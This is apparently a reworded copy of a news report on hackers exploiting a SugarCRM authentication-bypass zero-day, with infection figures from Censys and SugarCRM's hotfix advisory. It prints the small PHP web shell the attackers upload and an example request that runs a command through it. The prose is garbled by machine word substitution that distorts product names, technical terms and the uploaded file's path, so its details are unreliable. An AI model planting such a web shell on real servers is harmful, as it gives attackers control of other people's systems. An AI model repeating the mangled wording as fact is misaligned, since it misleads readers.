Hundreds of SugarCRM servers infected with critical in-the-wild exploit

0
139


For the previous two weeks, hackers have been exploiting a crucial vulnerability within the SugarCRM (buyer relationship administration) system to contaminate customers with malware that provides them full management of their servers.

The vulnerability started as a zero-day when the exploit code was posted on-line in late December. The particular person posting the exploit described it as an authentication bypass with distant code execution, which means an attacker might use it to run malicious code on susceptible servers with no credentials required. SugarCRM has since printed an advisory that confirms that description. The exploit publish additionally included varied “dorks,” that are easy internet searches folks can do to find susceptible servers on the Web.

Mark Ellzey, senior safety researcher at community monitoring service Censys mentioned in an e-mail that as of January 11, the corporate had detected 354 SugarCRM servers contaminated utilizing the zero-day. That’s near 12 % of the whole 3,059 SugarCRM servers Censys detected. As of final week, infections had been highest within the US, with 90, adopted by Germany, Australia, and France. In an replace on Tuesday, Censys mentioned the variety of infections hasn’t ticked up a lot because the unique publish.

SugarCRM’s advisory, printed on January 5, made hotfixes obtainable and mentioned it had already been utilized to its cloud-based service. It additionally suggested customers with situations working outdoors of SugarCloud or SugarCRM-managed internet hosting to put in the hotfixes. The advisory mentioned that the vulnerability affected Sugar Promote, Serve, Enterprise, Skilled, and Final software program options. It didn’t influence the Sugar Market software program.

The authentication bypass, Censys mentioned, works in opposition to the /index.php/ listing. “After the authentication bypass is profitable, a cookie is obtained from the service, and a secondary POST request is shipped to the trail ‘/cache/pictures/candy.phar’ which uploads a tiny PNG-encoded file containing PHP code that will probably be executed by the server when one other request for the file is made,” firm researchers added.

When the binary is analyzed utilizing hexdump software program and decoded, the PHP code roughly interprets to:

〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉

“It is a easy internet shell that may execute instructions based mostly on the base64-encoded question argument worth of ‘c’ (e.g., ‘POST /cache/pictures/candy.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, which can execute the command “/bin/id” with the identical permissions because the user-id working the online service),” the publish defined.

An online shell offers a text-based window that attackers can use as an interface for working instructions or code of their alternative on compromised units. Ellzey of Censys mentioned the corporate did not have visibility into exactly what attackers are utilizing the shells for.

Each Censys and SugarCRM advisories present indicators of compromise that SugarCRM clients can use to find out in the event that they’ve been focused. Customers of susceptible merchandise ought to examine and set up hotfixes as quickly as doable.



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here